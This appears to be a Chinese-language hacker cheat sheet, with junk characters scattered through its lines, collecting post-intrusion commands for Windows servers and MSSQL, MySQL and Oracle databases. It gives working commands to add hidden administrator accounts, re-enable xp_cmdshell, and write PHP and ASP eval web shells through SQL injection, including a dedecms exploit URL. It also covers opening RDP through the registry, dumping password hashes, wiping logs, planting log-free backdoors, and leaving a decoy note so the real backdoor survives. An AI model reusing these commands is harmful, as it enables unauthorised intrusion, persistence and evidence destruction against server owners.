5 I4 ]0 _4 E0 b. I
1.net user administrator /passwordreq:no5 K1 p1 h0 Q' d" D J
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了0 @4 Q3 ]9 M- K0 `& G4 P
2.比较巧妙的建克隆号的步骤
% ?; |: f3 x: t% E2 P! |先建一个user的用户
+ a/ S$ F5 d3 }! U0 y6 H然后导出注册表。然后在计算机管理里删掉
4 M1 I# P7 i1 y2 P+ _, s) q在导入,在添加为管理员组3 E" a/ M# r9 z; Y0 d' L) Z A
3.查radmin密码* p$ f% P8 [/ k$ N, j
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
" j' X" }4 {) n6 i3 C' V4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]) z3 l3 `2 @' h
建立一个"services.exe"的项" w- _! I4 K" S. m
再在其下面建立(字符串值)
( b; Q j. O V6 e键值为mu ma的全路径
5 s3 X2 t( @. x5 L5.runas /user:guest cmd
/ P, G' @* x4 a: J$ k测试用户权限!8 P0 D1 [/ U4 [5 c/ q3 h8 |
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?3 v8 o5 e. `. O' e2 @ I, P
7.入侵后漏洞修补、痕迹清理,后门置放:: E1 a% |5 O, U5 A4 G; ]
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门* m9 D* f+ l* e2 X- d& m
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c$ s* u4 E! x/ y9 Z r8 Z
% F& i! E* f, W' y
for example
4 y8 d0 b9 v& d" S7 Z# E6 n0 G& X
+ @; k ~* `( C& B4 A% @$ vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'& C; W$ r0 \4 _# F
5 \5 p# A" y% i# v. Qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
7 t6 }" K2 J, ?& `; w
6 G2 H* U9 h$ v" |9:MSSQL SERVER 2005默认把xpcmdshell 给ON了; R1 }, s% m; b6 k
如果要启用的话就必须把他加到高级用户模式
' D3 T: l/ y) b. Z! i可以直接在注入点那里直接注入
' Z% w( M' t: vid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
% U7 e) N; T8 w- j然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
8 O; ]% n" q# [3 e/ g或者
, o+ u! [* `7 M/ _sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'/ k( z/ Y4 ^4 ?3 q( {& O
来恢复cmdshell。4 W8 y9 a- N1 ]: i- o. k
& F% q2 I# ]" |0 h; T: ^) g0 k分析器) D# J' i- a! w
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
& ?" B' z h2 H8 y1 W1 b- N5 K8 T然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
1 v2 j: m* f0 E7 e10.xp_cmdshell新的恢复办法
& x" c8 L2 h/ h( ~4 u) p+ ]xp_cmdshell新的恢复办法+ h W; `. s/ U. }# V1 T9 _8 s7 ^6 V
扩展储存过程被删除以后可以有很简单的办法恢复: w5 z6 Q" J4 h. r' [- {; X( d
删除" C8 \) w7 C1 B/ S8 q) h* I
drop procedure sp_addextendedproc
3 s! N6 @6 l, x9 S* H; Z9 ^drop procedure sp_oacreate6 a- e% C/ r6 Z8 z( q
exec sp_dropextendedproc 'xp_cmdshell'8 ?% l' Q& b' n" S* O: O. W( q
4 C' c( F/ ^' R1 u% k( h
恢复
# G1 `6 R8 T* I1 tdbcc addextendedproc ("sp_oacreate","odsole70.dll")/ v- `% D5 m; S+ p7 P
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")& z% \% j- a9 P* g, J" [2 ]
6 \( n( B" x+ H, M7 l C# S( o
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
5 Z2 M6 g! b) a7 z) n0 k
: a* G6 i7 M% y% I3 O1 q-----------------------------
3 X v4 S7 Z4 ?& `+ U7 E( X$ P3 x# f* s
删除扩展存储过过程xp_cmdshell的语句:
% j) f) [4 g2 o* h$ o$ i* ~" dexec sp_dropextendedproc 'xp_cmdshell'
( q% W6 \* q0 D% L* B( s8 o
2 a* b {) J2 t' Z% ?2 m) X5 g' w9 T恢复cmdshell的sql语句
. u; q1 M& [+ s5 zexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
4 | L* W. U# I; M7 b7 g. ?& `& U
7 ?; b H& F1 }0 D% h6 p# w `% X8 z; z
开启cmdshell的sql语句! z, |+ i, `. e4 J4 P- E
: A6 h1 ~0 e) M4 z0 _
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
9 i7 G/ @" K6 o2 ~2 Z' w5 {% f+ k$ C4 \ D
$ q4 x0 X# A) g8 `2 T2 z" S1 `判断存储扩展是否存在2 @6 V2 `# V: |6 O2 L, e! C6 }4 m
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
4 V" b3 t! Z! h返回结果为1就ok2 F) o, U/ \- v& q# b' N
1 q/ k# H. [9 ~& x" h& z4 m$ G
恢复xp_cmdshell! O6 K3 r$ p$ ?2 y& w+ j: e
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'- z$ V' W7 O1 B; K9 t0 \: j# ?6 M
返回结果为1就ok
0 ]# H& L" o3 a. w1 n: S
4 Y' Y& {0 L; L# x A F否则上传xplog7.0.dll
: Q+ _" o! @) ?( I6 h- L2 l* Xexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
2 H1 {' ^) Z5 u4 h8 S3 ~& Z. ^1 z. b$ ~/ c; W2 ?5 E/ F
堵上cmdshell的sql语句
" p c8 \1 S( x5 F& J; Dsp_dropextendedproc "xp_cmdshel5 z- C) Y' s# U l, A u, [# R5 U
-------------------------
! }/ ]% I3 M2 q' \清除3389的登录记录用一条系统自带的命令:" l- C& D; K) X, w. f" \9 v
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f; E; i, r8 z6 U, h
2 }- O! L$ |, C; k- I8 Q
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
7 | d+ J) l7 g% z8 L在 mysql里查看当前用户的权限9 O, B3 {9 `# W+ U2 W7 F0 x
show grants for
) m; O. a0 a; T' P2 r* @4 q6 E n. y# I' p8 ^$ c
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。# }% ] Z- r' }# V9 v
9 n8 U7 ?$ o* |+ ]7 B
% d1 i" r* x$ g0 e5 G& R2 f# T* X4 XCreate USER 'itpro'@'%' IDENTIFIED BY '123';
[; ?& q' A ~/ e! q
: G4 b! n9 R# U8 GGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION7 R. U% ^4 D J
; A! N+ r0 c' P3 l' C& M
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0* P/ J' I. K$ r; @! ]; I
1 y/ q7 p2 q: Y8 o* L, I
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
3 E$ Z7 a9 o; Z8 Y* W
, ?2 h% y+ h; |% u% P搞完事记得删除脚印哟。
' X: v- m0 v, s9 {, H$ D! D7 T% r0 X' Q( L% M
Drop USER 'itpro'@'%';
' o( X; d6 ~/ f" D6 c4 }) L$ B
# Y* `; W4 q& h. `6 GDrop DATABASE IF EXISTS `itpro` ;9 f, C" l, H$ c2 L! D" N
" |9 [2 e8 q% U* @5 i当前用户获取system权限
: J. I) j) g* s1 Csc Create SuperCMD binPath= "cmd /K start" type= own type= interact9 l1 ?" N; I9 y
sc start SuperCMD- F q* h4 [( |- a$ d
程序代码
' @, f! s5 l. m7 J/ n# z<SCRIPT LANGUAGE="VBScript">0 P) h4 Y' \, L" ?" B1 Q
set wsnetwork=CreateObject("WSCRIPT.NETWORK")' @5 P# r, E! e! \# q
os="WinNT://"&wsnetwork.ComputerName
5 \6 |1 ^9 s" [6 d* g; Z) p' {Set ob=GetObject(os)2 S. [$ |# d, v B, d7 ~3 g/ s
Set oe=GetObject(os&"/Administrators,group")
, H% Q) i# s3 j( HSet od=ob.Create("user","nosec")
) ]# X, }: K' J1 Rod.SetPassword "123456abc!@#"
! a! v. X: @- f: s3 R6 X* p3 ?od.SetInfo
i" H, p+ ? vSet of=GetObject(os&"/nosec",user)5 W! V/ B; ?/ _/ h3 J
oe.add os&"/nosec"3 S0 [- f# q% `: d/ [- c0 A1 X9 @
</Script>
5 p$ T B1 ~9 Z/ y, _; e<script language=javascript>window.close();</script>
$ q( E% p% a# T- ^+ H3 r: U6 y7 _4 Q1 p' U( ~8 F
+ y: n/ s6 [* ] f4 c2 V
# y9 X; ~8 Z* V. J) n) N- Z w5 ]2 f* I, y3 P
突破验证码限制入后台拿shell
' s7 {% @1 E# z8 p% D/ Y6 w, p& f程序代码5 V( ^% N+ ^. S2 e" a) V
REGEDIT4 ! e0 `# {! \8 W! G8 d" a
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 7 L$ I) n9 b0 S4 Z; [& Z* a# y
"BlockXBM"=dword:000000006 Q$ Q1 D8 u& P7 Q, Z
0 m+ |; b4 D3 e: x) Z5 n
保存为code.reg,导入注册表,重器IE
, q7 _- l2 O5 J6 c1 G0 i就可以了
* a! }; Y- r( ~2 ^0 M ^. Punion写马
) r7 k& K3 A- `& ^程序代码
- s& g+ u, ?; b- _& {4 Gwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*- q! G4 y! I. }/ w" v7 r
* I2 i0 Y; ^: ?9 |* M) Q& W7 q6 u应用在dedecms注射漏洞上,无后台写马
, O5 K4 T: x6 X' g$ X: M$ xdedecms后台,无文件管理器,没有outfile权限的时候/ R4 q1 U4 @" R
在插件管理-病毒扫描里
, `) ?4 H; C- z2 ^% c4 \6 F写一句话进include/config_hand.php里
% |1 k0 N2 m% s! b# j程序代码: B* e1 s2 t' d! l6 }6 M
>';?><?php @eval($_POST[cmd]);?>6 Y0 F/ U7 X B
$ N% s; n* e/ a! r% _! @* T2 B K
9 J) ]0 p" E O$ h( k3 u如上格式
) `7 X$ W0 c8 M7 i- O3 c' r$ `8 j' O9 F! _
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
3 D7 L `8 K% Y0 k程序代码* |2 L6 {9 d8 s1 x
select username,password from dba_users;" I( O( \# H! ~8 l$ n X
9 R$ \; h, G7 P: c d: C% g; @- U0 A% T$ y' n
mysql远程连接用户
, ^- h/ W, j& K程序代码
1 h# O& A$ d3 [. R6 P! j
. b0 j- s+ ^4 V3 j0 L1 Z' a; y# GCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';+ Z( i' t+ L4 G) T5 ^' [+ D, D
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
) z: H6 t+ v( t* }: G( |MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
6 u5 J& U9 i, v- d3 `MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
3 `$ M9 A4 `- Q. \6 Y7 i C/ A: H
- D8 l( M+ A4 w9 y B. ?+ \9 |
+ `) ] |( b# r- _$ r" {2 O+ j
( Q: e& i/ F+ E" @9 J! |7 \ a- {" V% e( ?( l
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0& X) O1 b, ?0 r+ A# C8 Y5 {
, T) J3 N7 o5 }% k: H7 X
1.查询终端端口; T J- o7 P5 J, }# [
T0 X! i2 h& X' E( G# a
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
9 b! n& L7 Q* R) c+ a7 o8 |1 Z) ^5 k/ F7 s" G# W) D
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"" }" ?& r# n2 ~& z9 R: r4 G+ s
type tsp.reg
8 R- I ]; j2 S. C9 c" {/ G/ |
2 P' z* y Z z, L: U8 c1 w2.开启XP&2003终端服务8 [* v z8 x* o# C( q
* s4 _3 K* R# p5 l5 q# y$ z- y: {
3 Q% Z/ E1 N' P+ B# UREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f6 {, t+ X0 c' n% a% |: X* v( }" D# M
& n/ \' l# R- z
/ O& O _* b N' O) |REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f- H0 J) I0 c' V0 T: D
0 k' C7 d6 h# _2 s" D
3.更改终端端口为20008(0x4E28)
$ P& N+ V' e) \* n1 P# Z8 }2 s9 g# j4 f# d) g/ {9 ?) o
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f6 E0 P8 Z# r! t& U, I3 G
8 X1 [6 h/ b6 l
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
& a1 C/ B. p( w* Q
+ {- e' F* L+ l4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制3 j) O) |8 T1 @& y
/ J% O I4 g$ Z3 t
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
; c4 Y" j9 g# j9 _' i
0 S% S. \% d* \8 T* m5 k6 d7 z! M: s- q6 f
5.开启Win2000的终端,端口为3389(需重启)
2 m9 F P/ N* J- ^7 g
) S$ u P" H1 A, I6 |1 x9 Eecho Windows Registry Editor Version 5.00 >2000.reg 4 @- N, v* |& [7 \
echo. >>2000.reg/ b. z9 [6 ~9 m! t# O! \9 G' D
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ! ~1 Z" s4 f5 q' o# D+ T
echo "Enabled"="0" >>2000.reg . q% L, [. t2 l6 j$ _5 d
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg + T8 P; D- _( T" c5 _
echo "ShutdownWithoutLogon"="0" >>2000.reg % N/ V C& _8 {/ v5 z2 X7 t: A
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 9 k% y- x, |& I* Y* R6 V
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg 1 C+ N+ h3 o8 d! s/ _+ a) D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg : c& I9 Q& L) @) `
echo "TSEnabled"=dword:00000001 >>2000.reg 1 J* N: ?' I$ h6 T) Q, @/ _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 1 D" V/ _0 }0 }: \6 F
echo "Start"=dword:00000002 >>2000.reg \" \0 S2 F2 k3 D# c, M. ~
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
/ U! y* \* y( K4 eecho "Start"=dword:00000002 >>2000.reg
9 F7 H1 E F7 ~; o/ l0 Secho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ) M% G1 ?' H# k: C+ Y8 a0 P! x
echo "Hotkey"="1" >>2000.reg
/ _9 |( _ v0 t% [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
' h( E: i. _& u1 m K6 @2 q1 Zecho "ortNumber"=dword:00000D3D >>2000.reg
^2 M3 W5 w2 W+ p4 mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
5 \1 r; a N Q( Jecho "ortNumber"=dword:00000D3D >>2000.reg
7 l# n/ g* A* |/ X/ t& d$ H9 f! z+ v2 y- k
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启): [4 d9 j2 u* f" x3 ?
$ I. j* R* [8 C@ECHO OFF & cd/d %temp% & echo [version] > restart.inf/ z6 {$ z' h3 e6 S: N! w1 }
(set inf=InstallHinfSection DefaultInstall)
$ i. o- C' _$ Z2 ?9 j- X- E/ Aecho signature=$chicago$ >> restart.inf& W' i/ R: X0 I" j6 i. @
echo [defaultinstall] >> restart.inf
2 H. R4 o! u9 \: R5 Grundll32 setupapi,%inf% 1 %temp%\restart.inf
) P. m9 k3 N* J, ^4 S. _
# |3 x6 `% @! y( D4 m- p
& v1 D8 F. }5 b' t0 A5 w7.禁用TCP/IP端口筛选 (需重启)6 R& D L, \1 i9 G: H4 e' X( f
8 E' n" S, X: B# _3 c; \, U6 W
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f I, k3 L7 d: ]( o. N2 B
6 ]$ t/ }1 H4 u$ o8.终端超出最大连接数时可用下面的命令来连接
( A7 u o& K$ \4 g6 o7 A* P, t# ^: n8 _" p7 t8 R
mstsc /v:ip:3389 /console
. `2 |% R: Y& T8 D) a$ z& L' d4 [# U2 a$ d6 o8 }0 l
9.调整NTFS分区权限* Q- R+ J( |" v
8 U( I6 y* N# \% b, e2 m
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
6 E. c [4 Z% p2 D4 A+ c- I7 g6 j0 ]( ^
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
1 A8 s$ a$ u, H; h, h4 J4 N! y6 V) w7 U. K
------------------------------------------------------1 @7 H! D7 _0 A7 J0 @& ?
3389.vbs ) O( S- N/ L7 y& b& V7 B' B& E
On Error Resume Next0 } a+ M- p( [" [7 r
const HKEY_LOCAL_MACHINE = &H80000002
% c) z; K, J6 O) J% gstrComputer = "."
$ ^! A% S4 j" M; p& PSet StdOut = WScript.StdOut& b1 X/ \/ W0 e7 ]4 i% m$ v4 A* d
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
1 V% l: l7 d/ [% L9 `strComputer & "\root\default:StdRegProv")
- K' B: } D' Z3 qstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"& J3 D% j- h; H1 Q9 s. t3 V H
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath( a- @- _( x9 A/ u, E# Y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
" @0 Y$ U! h) H7 D' zoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath5 Q' h `- \8 M: G" h
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
$ G* M) F+ `, x4 i6 y( rstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"4 s! G- {5 e$ I
strValueName = "fDenyTSConnections"
& }! K( H0 H# I6 P6 @- a" \dwValue = 0
1 H1 Q! r* k8 A0 voreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. S. R4 X8 t( d7 }, fstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"& S8 Y2 k0 A( c0 @7 [$ T& K: m( j e
strValueName = "ortNumber"
$ v6 W2 k7 ]4 q. c# D+ UdwValue = 3389
" a2 k: v: P5 c+ r* J% \' @0 poreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue, {& _4 V( ~# s# x6 g# E, l
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
9 v% o+ [4 o5 ]5 ^# EstrValueName = "ortNumber"* [8 B6 h' n5 y0 `6 z6 K) r: U9 s
dwValue = 3389; g* C/ V; e8 j" B& a- G
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
% l( }% @+ d QSet R = CreateObject("WScript.Shell")
+ M! C9 A2 t. y5 F6 u6 MR.run("Shutdown.exe -f -r -t 0")
9 U0 B' U& @7 O) x: L" U/ U8 q" q6 x$ W, T% Z7 I' v" |
删除awgina.dll的注册表键值: c0 X# ~4 v3 {! e6 \
程序代码
6 @: o4 g3 b$ T8 O4 E
! s, z; z; `' s3 freg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
' Y" o: `7 w M4 w" @# i3 R' U8 }
! `8 U5 k8 f- i! G& y/ A
7 k& u% h1 Z, ]/ M' `+ F" R& O j5 ^3 ?& y# K$ o+ C0 u
程序代码
v# Z* Y8 E* i" r3 u: i& }HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
9 x" n9 l3 S0 d0 f) @* J1 A5 f, n% [' Z$ b% G( K
设置为1,关闭LM Hash" w8 [( z+ A& h0 J9 m9 A
* O* l7 K7 P* m8 `" @' f' Z
数据库安全:入侵Oracle数据库常用操作命令2 P; p& V/ z" ^' ^( c5 ~/ ^ o
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
" T7 `# o) K: e& M1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。; u. b3 X9 | \4 x" m
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
f2 K( N2 ^: u z y( K3、SQL>connect / as sysdba ;(as sysoper)或# b! g; W& a2 A1 m
connect internal/oracle AS SYSDBA ;(scott/tiger)
( d8 S8 [- F; }" Q* ^* l" g$ Gconn sys/change_on_install as sysdba;
2 Z" p, O& g: x4、SQL>startup; 启动数据库实例
7 e# {. b5 f# g8 P5、查看当前的所有数据库: select * from v$database;
t9 U( p( E8 M5 V, \0 P, f1 Rselect name from v$database;
3 i, r! S1 D. `7 ]6、desc v$databases; 查看数据库结构字段
- Z& X) K- g+ f0 G7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
7 ^ k# ]2 E1 F: c& j0 }: gSQL>select * from V_$PWFILE_USERS;; `9 P: _& k3 r( J
Show user;查看当前数据库连接用户
6 b: X2 e& w" Q" l! x) K* G8、进入test数据库:database test;3 H2 Z0 E: A) H
9、查看所有的数据库实例:select * from v$instance;
7 G2 _* X& t5 M5 C如:ora9i
: N% S0 @6 a8 C% l10、查看当前库的所有数据表:: y) y5 Q! x" }/ m0 m G& i# P
SQL> select TABLE_NAME from all_tables;0 T" x1 @0 G. ~$ S" v, Y1 M
select * from all_tables;
6 j5 T/ t. x3 _9 n& RSQL> select table_name from all_tables where table_name like '%u%';
/ s# H5 P* f0 D( m* k6 BTABLE_NAME6 c8 k$ y5 r& z6 Q( O0 Z# Z9 u5 L1 j
------------------------------
% b/ ]( |; \6 F" _3 Y' n: J# [_default_auditing_options_
" L0 K9 }! M! r11、查看表结构:desc all_tables;
! w; @: \& z5 U, d2 M2 J# w; `12、显示CQI.T_BBS_XUSER的所有字段结构:# `0 Q$ \/ N- I' O, E( n% m
desc CQI.T_BBS_XUSER;! `; b$ Y! U$ X0 ~) x
13、获得CQI.T_BBS_XUSER表中的记录:
- s- o% E2 n5 h0 h( ]8 Aselect * from CQI.T_BBS_XUSER;7 h' i" M) f% w6 b/ s h
14、增加数据库用户:(test11/test)
4 s" w* r$ o" }create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
1 i$ S5 @( o4 P( x15、用户授权:
1 ] i/ Z& o3 V& `* Ggrant connect,resource,dba to test11;
9 I ^+ R2 m4 \/ @. Jgrant sysdba to test11;
7 _2 a- [1 l; ~. Rcommit;; X; P0 z3 v2 @: q" O0 w! H
16、更改数据库用户的密码:(将sys与system的密码改为test.)2 V: v1 Q" y; I+ W0 h1 @' G
alter user sys indentified by test;
4 |: m, |/ L+ Y( I6 A0 Malter user system indentified by test;0 m) \$ Q! f6 d+ }$ v
5 \, Y( l$ d: T5 a
applicationContext-util.xml; e) ?2 ^5 D1 b# z% C6 y
applicationContext.xml
$ Z m" d1 s$ G' K" g* Bstruts-config.xml! {- T6 o8 }) P- {1 d/ s2 E
web.xml: l: {, I1 B4 a
server.xml. V5 d! E- @& t1 N( f4 s
tomcat-users.xml
) e; b# v2 A- q' y& t% ]' fhibernate.cfg.xml
6 }# Z7 _) v- R6 p/ Vdatabase_pool_config.xml
% E$ n6 M! l5 W; W! b' h R
) z7 j, c. _2 H# b Q: A" }$ Q9 j* h/ g, L
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置7 P3 }1 A$ x. p! i+ d# [
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini; |( `4 M, R) j4 a+ Q9 @. Y. N
\WEB-INF\struts-config.xml 文件目录结构 E/ v" g. ^* u# @/ I0 C# ~0 h
3 V( n2 {9 A3 u `
spring.properties 里边包含hibernate.cfg.xml的名称
6 R: @5 T6 s1 s! j& X6 r/ G3 m) X/ R9 G
0 T! K- W2 N3 e% g+ \( u& F
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml% _. R9 f0 \# F8 D7 B6 w5 U$ }( b
$ p& ?- \& ^7 |4 Z! {: u8 H如果都找不到 那就看看class文件吧。。
0 x2 x3 O9 n2 W; G9 b& D
5 r- h$ Q/ I* _' m测试1:
# {1 ^8 q5 U4 m2 h! MSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
, ?, f5 @2 ^5 m/ V/ _
+ l& X; e8 Z5 [0 y' _ `2 e! h测试2:
: b i e+ N) c9 }% q0 x1 x2 c2 U i9 x
create table dirs(paths varchar(100),paths1 varchar(100), id int). \9 Y+ c6 F, k
" s1 I/ _& g, `: K
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--3 |4 s+ s" x5 k: K; x
0 ~. R9 _" j1 W* W6 \
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1; H' G) f3 m# O8 g' f' Y
G ^( Y9 T% ^+ s, D$ W查看虚拟机中的共享文件:" N* v3 |) w w9 M& U
在虚拟机中的cmd中执行
4 M1 {. @' Y- ]/ H( y! D+ S0 l& z\\.host\Shared Folders8 K% p% b2 Y$ E$ t
: m( ?! [/ D5 F1 m* f7 ?cmdshell下找终端的技巧4 e. y6 _0 z: ]1 x. d
找终端: ! a; X- m7 n% l1 K" K% o! D+ J" H! E
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 8 O1 `$ g- Y3 @+ t' ]" C
而终端所对应的服务名为:TermService % \5 z$ S7 c G) m. T
第二步:用netstat -ano命令,列出所有端口对应的PID值! ( ^( p9 j! A9 p) Y# u' _
找到PID值所对应的端口 D" Z8 A1 x0 z
) e, L5 m- x. y$ T) H查询sql server 2005中的密码hash/ b8 n2 H* ~+ B0 q% ]- s
SELECT password_hash FROM sys.sql_logins where name='sa'# y @, F7 y- a( v" E! u
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
1 o X$ @. @# raccess中导出shell$ s4 G. w$ _& v6 b
- J& j0 ^" ^4 S9 \- b6 B) Y
中文版本操作系统中针对mysql添加用户完整代码:( U5 g- {6 E2 Q7 f+ A0 u* _9 D
